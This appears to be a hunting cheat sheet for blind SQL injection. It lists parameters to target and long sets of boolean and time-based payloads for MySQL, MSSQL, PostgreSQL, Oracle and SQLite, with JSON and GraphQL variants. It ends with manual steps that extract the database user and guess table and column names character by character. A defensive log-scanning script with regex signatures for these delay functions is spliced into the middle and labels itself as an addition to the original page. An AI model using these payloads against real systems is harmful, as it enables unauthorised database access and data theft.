Blind SQL Injection is a type of SQL Injection where the attacker does not directly see the output of the injected query. Detection and exploitation of blind SQL injection often rely on observing indirect indicators, such as changes in webpage behavior, delays in response times, or DNS lookups.
HUNT for Blind SQL Injection:
Time-Based (GET, POST, PUT)
Apply on:
- Search
- First name, last name, number, any kind of date
- Email or password (register, login, reset password)
- Any kind of product, menu, keyword, payment
- Cookie, User-Agent, Referer, X-Forwarded-For headers
Parameter list (regular):
id
cid
pid
page
search
username
name
register
first name
last name
email
pass
password
dir
category
class
file
news
item
menu
lang
ref
title
time
view
topic
thread
type
date
form
join
main
nav
region
select
report
role
update
query
user
sort
where
params
process
row
table
from
results
sleep
fetch
order
keyword
column
field
delete
string
number
filter
Detecting Blind SQL Injection
Boolean-based Blind SQL Injection:
This technique relies on injecting SQL queries that return different results based on a true or false condition. The web application’s response will vary, revealing whether the injected part was true or false.
Example Payloads:
- Oracle:
' OR '1'='1 --
- Microsoft SQL Server:
' OR 1=1 --
- PostgreSQL:
' OR 1=1 --
- MySQL:
' OR 1=1 --
- SQLite:
' OR 1=1 --
If the application behaves differently (e.g., displays different content or errors), it indicates a potential SQL injection vulnerability.
Time-based Blind SQL Injection:
This technique relies on causing a delay in the web application’s response if the injected query is true.
Example Payloads:
- Oracle:
'; BEGIN dbms_pipe.receive_message(('a'),10); END; --
- Microsoft SQL Server:
'; IF (1=1) WAITFOR DELAY '0:0:10'; --
- PostgreSQL:
'; SELECT pg_sleep(10); --
- MySQL:
'; SELECT SLEEP(10); --
- SQLite: (SQLite does not natively support time delays, but can be tested indirectly through application-level behavior)
MySQL Blind (Time Based):
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(5),0)/*"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"*/
if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'\"+(select(0)from(select(sleep(5)))v)+\"*/
',''),/*test*/%26%26%09sLeEp(5)%09--+
AND BLIND:
1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:
or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#
')) or sleep(5)='
" or sleep(5)#
1) or sleep(5)#
)) or sleep(5)='
1)) or sleep(5)#
or sleep(5)#
%20'sleep%2050'
%20$(sleep%2050)
")) or sleep(5)="
or sleep(5)='
") or sleep(5)="
) or sleep(5)='
1 or sleep(5)#
You can replace AND / OR
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RLIKE BLIND:
You can replace AND / OR
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
ELT Blind:
You can replace AND / OR
' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
BENCHMARK:
You can replace AND / OR
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
If the response is delayed, it indicates a potential SQL injection vulnerability.
Microsoft SQL Server Blind (Time Based):
;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--
1 waitfor delay '0:0:5'--
1' waitfor delay '0:0:5'--
Postgresql Blind (Time Based):
";SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
' SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
or pg_sleep(5)--
) or pg_sleep(5)--
)) or pg_sleep(5)--
Oracle Blind (Time Based):
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
Generic Time Based SQL Injection Payloads:
sleep(5)#
(sleep 5)--
(sleep 5)
(sleep(5))--
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
";sleep 5--
";sleep 5
";sleep(5)--
";sleep(5)
";SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + '
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
;sleep 5--
;sleep 5
;sleep(5)--
;sleep(5)
;SELECT SLEEP(5); #
'&&SLEEP(5)&&'1
' SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
If the response is delayed by roughly 5 to 7 seconds, the parameter is likely vulnerable.
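From the defender's side, the delay primitives catalogued above (SLEEP/BENCHMARK, WAITFOR DELAY, pg_sleep, DBMS_PIPE.RECEIVE_MESSAGE, RANDOMBLOB) are easy to match in web server logs, and correlating a match with the recorded response time tells you whether the delay actually executed. The following detector is an added example, not part of the original page; the log lines are constructed, and the log format (combined log plus a trailing response-time field in seconds, as nginx's $request_time) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not from the page). Assumed format: combined log
# followed by the response time in seconds, e.g. nginx's $request_time.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /page/search?q=1 HTTP/1.1" 200 5120 0.041
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /page/search?q=1%20and%20sleep(5)-- HTTP/1.1" 200 5120 5.062
203.0.113.5 - - [10/Jan/2024:10:00:09 +0000] "GET /page.aspx?id=1;%20WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1" 200 812 5.104
198.51.100.7 - - [10/Jan/2024:10:00:10 +0000] "GET /items?sort=name HTTP/1.1" 200 2048 0.033
198.51.100.7 - - [10/Jan/2024:10:00:11 +0000] "GET /items?sort=name%20or%20pg_sleep(5)-- HTTP/1.1" 200 2048 0.030
203.0.113.9 - - [10/Jan/2024:10:00:12 +0000] "GET /blog?id=1' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- HTTP/1.1" 500 0 4.900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<rt>\d+(?:\.\d+)?)$'
)

# One pattern per delay primitive that appears in the payload lists above.
# Insertion order is preserved, so classify() returns families in this order.
SIGNATURES = {
    "mysql_sleep": re.compile(r"\bsleep\s*\(?\s*\d+", re.I),
    "mysql_benchmark": re.compile(r"\bbenchmark\s*\(\s*\d+\s*,", re.I),
    "mssql_waitfor": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "pgsql_sleep": re.compile(r"\bpg_sleep\s*\(", re.I),
    "oracle_pipe": re.compile(r"dbms_pipe\.receive_message", re.I),
    "sqlite_randomblob": re.compile(r"\brandomblob\s*\(", re.I),
}


def classify(request: str) -> list:
    """Return the delay primitives found in a request line after URL-decoding.

    Decoding first is what makes %20 / %2b / %09 obfuscated payloads match.
    """
    decoded = unquote_plus(request)
    return [name for name, pat in SIGNATURES.items() if pat.search(decoded)]


def analyze_line(line: str, delay_threshold: float = 4.0):
    """Parse one log line; return a finding dict or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    families = classify(m["req"])
    if not families:
        return None
    rt = float(m["rt"])
    return {
        "ip": m["ip"],
        "request": m["req"],
        "families": families,
        "response_time": rt,
        # A matching payload AND a response that took at least the threshold
        # is the strongest signal that the injected delay ran server-side.
        # A match without the delay is still an attempt worth alerting on.
        "delayed": rt >= delay_threshold,
    }


def scan(log_text: str, delay_threshold: float = 4.0) -> list:
    """Run analyze_line over every line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        hit = analyze_line(line, delay_threshold)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "DELAYED" if f["delayed"] else "no delay"
        print(f"{f['ip']:<14} {','.join(f['families']):<18} "
              f"rt={f['response_time']:.2f}s [{flag}]")
```

The threshold of 4 seconds is chosen against the 5-second payloads on this page; tune it to the delay value you expect and to your application's normal latency.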
Blind SQL injection in JSON:
[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]
{AnD SLEEP(5)}
{1 AnD SLEEP(5)}
{1' AnD SLEEP(5)--}
{sleep 5}
"emails":["AnD SLEEP(5)"]
"emails":["[email protected]' OR SLEEP(5)#"]
{"options":{"id":[],"emails":["AnD SLEEP(5)"],
Blind Sql injection in Graphql:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name Payload","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
Example:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
Blind Sql injection exploitation (Manual):
MySql Time Based:
RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1-SLEEP(5)
RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).
SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())
RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.
SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)
Time Based Sqli:
1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#
Error Blind SQLi:
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
Ultimate Sql injection Payload:
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Exploitation:
redact.com/page/search?q=1 and sleep(5)--
Current user:
redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--
redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--
redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--
Table name guessing:
redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
Mssql Time Based:
RESULTING QUERY (WITH MALICIOUS DELAY INJECTED).
SELECT * FROM products WHERE id=1; WAITFOR DELAY '00:00:5'
RESULTING QUERY (VERIFY IF USER IS SA).
SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAITFOR DELAY '00:00:5'
Exploitation:
http://redact.com/page.aspx?id=1; WAITFOR DELAY '00:00:5'-- (+5 seconds)
TIME-BASED Extraction of CURRENT DATABASE USER
Determine Length of USER:
http://redact.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--
